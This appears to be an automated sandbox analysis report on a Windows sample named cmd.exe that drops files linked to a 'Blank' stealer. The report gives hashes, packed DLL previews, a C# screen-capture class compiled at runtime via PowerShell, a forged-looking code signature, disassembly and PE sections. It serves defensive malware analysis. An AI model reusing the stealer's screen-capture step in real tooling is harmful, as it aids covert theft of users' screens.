                                                                                                                                                                                                                                    Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\cmd.exe
                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):24952
                                                                                                                                                                                                                                    Entropy (8bit):7.392326214954849
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:384:+m71gl6dfHKsh8Za7gJXpDCI77G26IIYiSy1pCQ0AA7Pxh8E9VF0Nym5ty:11gl65HKNp5DCI77G2WYiSyv87PxWEgC
                                                                                                                                                                                                                                    MD5:666358E0D7752530FC4E074ED7E10E62
                                                                                                                                                                                                                                    SHA1:B9C6215821F5122C5176CE3CF6658C28C22D46BA
                                                                                                                                                                                                                                    SHA-256:6615C62FA010BFBA5527F5DA8AF97313A1AF986F8564277222A72A1731248841
SHA-512:1D3D35C095892562DDD2868FBD08473E48B3BB0CB64EF9CCC5550A06C88DDA0D82383A1316B6C5584A49CA28ED1EF1E5CA94EC699A423A001CCD952BD6BD553D
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........].t.<r'.<r'.<r'.D.'.<r'.@s&.<r'.@w&.<r'.@v&.<r'.@q&.<r'i@s&.<r'.<s'.<r'.Ns&.<r'i@.&.<r'i@r&.<r'i@.'.<r'i@p&.<r'Rich.<r'........PE..d...&..c.........." ...".0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\cmd.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):623480
Entropy (8bit):7.993502110233887
Encrypted:true
SSDEEP:12288:IZNIrMyJHzTarSwdWd5Xhm/27cz5hQYuHDiL1IcUq4P8ryHn5+8ybL:YNPsHzTaWwdS5xV70QYMDiCc34e8nI82
MD5:BD2819965B59F015EC4233BE2C06F0C1
SHA1:CFF965068F1659D77BE6F4942CA1ADA3575CA6E2
SHA-256:AB072D20CEE82AE925DAE78FD41CAE7CD6257D14FD867996382A69592091D8EC
SHA-512:F7758BD71D2AD236BF3220DB0AD26F3866D9977EAB311A5912F6E079B59FA918735C852DE6DBF7B5FEE9E04124BC0CD438C4C71EDC0C04309330108BA0085D59
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......CG;..&U..&U..&U..^..&U.HZT..&U.HZP..&U.HZQ..&U.HZV..&U..TT..&U..&T..&U..Z]..&U..ZU..&U..Z...&U..ZW..&U.Rich.&U.................PE..d...X..c.........." ...".0...0............................................................`.............................................d"..................................x...........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc....0...........,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Users\user\Desktop\cmd.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):294784
Entropy (8bit):7.987175768019268
Encrypted:false
SSDEEP:6144:PudZUEjoXwDrGv4qJBd4R0u3FIp6O4LMHS+OsfW/+vzoFZ:EGEjyirGd+f3FIp7eMHS+CUUr
MD5:7A462A10AA1495CEF8BFCA406FB3637E
SHA1:6DCBD46198B89EF3007C76DEB42AB10BA4C4CF40
SHA-256:459BCA991FCB88082D49D22CC6EBFFE37381A5BD3EFCC77C5A52F7A4BB3184C0
SHA-512:D2B7C6997B4BD390257880A6F3336E88D1DD7159049811F8D7C54E3623E9B033E18E8922422869C81DE72FC8C10890C173D8A958D192DD03BFC57CFFAEA1AC7B
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t..t..t..}...r..;...v..;...y..;...|..;...w.....w......v..t..%.....u.....u...y.u.....u..Richt..........PE..d...(..c.........." ...".P..........@V... ................................................`..........................................{..X....y.......p..........<............{......................................@b..@...........................................UPX0....................................UPX1.....P... ...D..................@....rsrc........p.......H..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.093490431917851
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry6G5ak7YnqqfGOPN5Dlq5J:+RI+ycuZhNc+akSffPNnqX
MD5:FA4EA160D5CB4B9E7C12F49128BFB617
SHA1:DA3A8EE291D4D435B78F83A1ABCE4C1724595846
SHA-256:40B753643CF8574332B04D35650BD279AB03528BD41D63B86F8736C2E083A562
SHA-512:5A71BDD2D8BA84F0C8CD5C01AC6EBB305A30544DDCFC6FA5FF710377F220A58A2D17205C31DCA6348490945D308C4098A61C7E60729D7022D8F5000B0212BD46
Malicious:false
Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.c.d.u.5.f.i.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.c.d.u.5.f.i.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1004
Entropy (8bit):4.154581034278981
Encrypted:false
SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:C76055A0388B713A1EABE16130684DC3
SHA1:EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:false
Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
Category:dropped
Size (bytes):607
Entropy (8bit):5.323271795325248
Encrypted:false
SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfM2qWZEifM2dxn:V3ka6KOkqeFkOffEifJx
MD5:2280EE757C74153BC79BEC1678B4D4FE
SHA1:ED8631FD218B66FECFEEE936CB9AA49FF3F353CE
SHA-256:C4C66724391147784DBB6EE4690F7DF0B1A04718D0953BD59E29810CA27F97DF
SHA-512:3D9477802D0866F8495E5B55C59FA722055B872787313D229AEB4F13C1FE2AE08AB5CF55A030AEBCB07274703EEF5E2E4A9C800246364FD5113FA3A451781983
Malicious:true
Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.0.cs"
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):4096
Entropy (8bit):3.155698291019072
Encrypted:false
SSDEEP:48:657oEAtf0KhzBU/pf6mtJ7mN0CDpW1ulc+a3f9q:HNz04mjmO6K+Kf
MD5:9F056B4E6B2FFE4BF190CC59DE0A1D81
SHA1:C5F4DB30964C4EF48B3C589C10896D1E7028F291
SHA-256:14ED91645AAC7B2C8A7030C97277A6045693A6A18693403C265E1DFC163322D2
SHA-512:5A771F627B7C714EF5A50351A1E348BE70A62DFEFCC9205E4BA648D3833B0EBB803F10B541E5D4B19196D0C646A54BE47D813D343AF75A644E1E2E3199562203
Malicious:false
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...I=Bg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
Category:modified
Size (bytes):1148
Entropy (8bit):5.4963940007946865
Encrypted:false
SSDEEP:24:KJfIId3ka6KOkqeFkOffEifJUKax5DqBVKVrdFAMBJTH:uIkka6NkqeFkyfEuJUK2DcVKdBJj
MD5:4DC05C530E556E36978FE5CF3E6B4DF2
SHA1:DCC095A91D74A473F3FCBAFD5D5869EB2AB377FF
SHA-256:DE9233F53BCC6E2D806FDE0FF00E99F4FB5793736CFB2DD2A4065AC458D16884
SHA-512:9CDCAB3F42090BD863D86741E2F5A60B30DFB5AC9AFF8A26D2045D07705E8CF1E06D9B455D2751F2FD94EA9D5A80FBEEED7BBCF494F368C5110FDB6C19FD4925
Malicious:false
Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bcdu5fii\bcdu5fii.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer
Process:C:\Windows\System32\svchost.exe
File Type:JSON data
Category:dropped
Size (bytes):55
Entropy (8bit):4.306461250274409
Encrypted:false
SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:DCA83F08D448911A14C22EBCACC5AD57
SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:false
Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
Process:C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):97
Entropy (8bit):4.331807756485642
Encrypted:false
SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:195D02DA13D597A52F848A9B28D871F6
SHA1:D048766A802C61655B9689E953103236EACCB1C7
SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:false
Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
File type:PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):7.989769456024753
TrID:
• Win64 Executable GUI (202006/5) 92.65%
• Win64 Executable (generic) (12005/4) 5.51%
• Generic Win/DOS Executable (2004/3) 0.92%
• DOS Executable Generic (2002/1) 0.92%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:cmd.exe
File size:6'263'156 bytes
MD5:b2fe874c2e11c56edf05c5250a8c966f
SHA1:06d6e28c3cb46e06195a5f8c360d8eeaddfb1c06
SHA256:255113355555cad23594618b606e851b38bcf588d902ec2678bb893582a90a4f
SHA512:915ec47beaf9a572c135fe0ddcccf2bb18b6620dcaf9fc8069436e4fe8d3dce15424c3043b45668c7c4f81e513bb731d7bd310eacea6ea1e01cb019b1cc71b90
SSDEEP:98304:skEtdFBCm/I5NamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzQgsRuGK4RxOnAKuP/ty/:szFIm/PeN/FJMIDJf0gsAGK4R0nAKuXq
TLSH:7E563370279409E1FDBA463EC866C84AC1B0FC050764DE8B136492BA2F33B555E7FB96
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..
Icon Hash:90cececece8e8eb0
Entrypoint:0x14000ce20
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x140000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:0x67415729 [Sat Nov 23 04:16:41 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
Signature Valid:false
Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232
Not Before, Not After
• 28/09/2021 20:00:00 28/09/2024 19:59:59
Subject Chain
• CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
Version:3
Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
Serial:00BFB15001BBF592D4962A7797EA736FA3
Instruction
dec eax
sub esp, 28h
call 00007F12DCFA001Ch
dec eax
add esp, 28h
jmp 00007F12DCF9FC3Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F12DCFA03E8h
test eax, eax
je 00007F12DCF9FDE3h
dec eax
mov eax, dword ptr [00000030h]
dec eax
                                                                                                                                                                                                                                    mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                    jmp 00007F12DCF9FDC7h
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    cmp ecx, eax
                                                                                                                                                                                                                                    je 00007F12DCF9FDD6h
                                                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    cmpxchg dword ptr [0003570Ch], ecx
                                                                                                                                                                                                                                    jne 00007F12DCF9FDB0h
                                                                                                                                                                                                                                    xor al, al
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                                    mov al, 01h
                                                                                                                                                                                                                                    jmp 00007F12DCF9FDB9h
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                                                                    test ecx, ecx
                                                                                                                                                                                                                                    jne 00007F12DCF9FDC9h
                                                                                                                                                                                                                                    mov byte ptr [000356F5h], 00000001h
                                                                                                                                                                                                                                    call 00007F12DCF9F515h
                                                                                                                                                                                                                                    call 00007F12DCFA0800h
                                                                                                                                                                                                                                    test al, al
                                                                                                                                                                                                                                    jne 00007F12DCF9FDC6h
                                                                                                                                                                                                                                    xor al, al
                                                                                                                                                                                                                                    jmp 00007F12DCF9FDD6h
                                                                                                                                                                                                                                    call 00007F12DCFAD31Fh
                                                                                                                                                                                                                                    test al, al
                                                                                                                                                                                                                                    jne 00007F12DCF9FDCBh
                                                                                                                                                                                                                                    xor ecx, ecx
                                                                                                                                                                                                                                    call 00007F12DCFA0810h
                                                                                                                                                                                                                                    jmp 00007F12DCF9FDACh
                                                                                                                                                                                                                                    mov al, 01h
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    inc eax
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    sub esp, 20h
                                                                                                                                                                                                                                    cmp byte ptr [000356BCh], 00000000h
                                                                                                                                                                                                                                    mov ebx, ecx
                                                                                                                                                                                                                                    jne 00007F12DCF9FE29h
                                                                                                                                                                                                                                    cmp ecx, 01h
                                                                                                                                                                                                                                    jnbe 00007F12DCF9FE2Ch
                                                                                                                                                                                                                                    call 00007F12DCFA035Eh
                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                    je 00007F12DCF9FDEAh
                                                                                                                                                                                                                                    test ebx, ebx
                                                                                                                                                                                                                                    jne 00007F12DCF9FDE6h
                                                                                                                                                                                                                                    dec eax
                                                                                                                                                                                                                                    lea ecx, dword ptr [000356A6h]
                                                                                                                                                                                                                                    call 00007F12DCFAD112h
Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x3ca34          0x78          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x47000          0x968         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x44000          0x2238        .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY        0x5f6d2c         0x2448        (none, see note)
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x48000          0x764         .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x3a080          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x39f40          0x140         .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2b000          0x4a0         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Note: IMAGE_DIRECTORY_ENTRY_SECURITY is the one directory whose address is a raw file offset rather than an RVA, which is why it maps to no section. Its offset 0x5f6d2c lies roughly 5.7 MB beyond the end of the section data (the six raw sizes sum to 0x41000, plus headers), so the signed file carries a large overlay that the section table does not describe. The empty TLS and COM_DESCRIPTOR entries mean there are no TLS callbacks and this is a native, not a .NET, image.
Sections

Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
.text   0x1000           0x29f70       0x2a000   b8c3814c5fb0b18492ad4ec2ffe0830a  False     0.5518740699404762  data       6.489205819736506   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x2b000          0x12a28       0x12c00   8e90e31fefe08b1c816d6044594d54d8  False     0.5243229166666666  data       5.750770296559466   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x3e000          0x53f8        0xe00     dba0caeecab624a0ccc0d577241601d1  False     0.134765625         data       1.8392217063172436  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata  0x44000          0x2238        0x2400    9cd1eac931545f28ab09329f8bfce843  False     0.4697265625        data       5.2645170849678795  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0x47000          0x968         0xa00     6a105e1c14897b38a163ad6994872bbe  False     0.422265625         data       5.075410316669733   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x48000          0x764         0x800     816c68eeb419ee2c08656c31c06a0fff  False     0.5576171875        data       5.2809528666624175  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

